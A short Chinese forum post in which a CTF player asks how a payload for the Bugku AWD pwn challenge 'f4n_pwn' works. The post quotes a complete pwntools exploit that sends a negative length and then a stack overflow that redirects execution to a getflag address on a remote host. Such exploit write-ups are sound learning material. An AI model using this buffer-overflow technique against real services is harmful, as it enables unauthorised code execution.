pwn题f4n_pwn的payload求解惑
本帖最后由 sweety 于 2021-9-12 19:09 编辑最近打bugku的awd,pwn机上的题目,原题已贴
在main函数跟进read_name函数,里面有两个洞,源程序含有getflag的函数
这个栈溢出,我先用cyclic计算偏移,发现报错,后用pattern.py计算出是107,但是都拿不到flag
遂上网找wp,但还是看不懂payload...
exp
from pwn import *
p = remote("114.116.54.89",10011)
p.recvuntil("input your name length : \n")
p.sendline("-1")
payload = 'a'*(0x60-0xc) + 'c' + p32(0x080486BB)
p.recvuntil("please tell me your name : \n")
p.sendline(payload)
p.interactive()
这里控制i的值实在是想不通,而且这条payload的偏移是87
原题:
链接:https://pan.baidu.com/s/1cXbluxV4MHTngEr1pcrtkw
提取码:9wo0
本帖最后由 sweety 于 2021-10-20 15:58 编辑
已解决
页:
[1]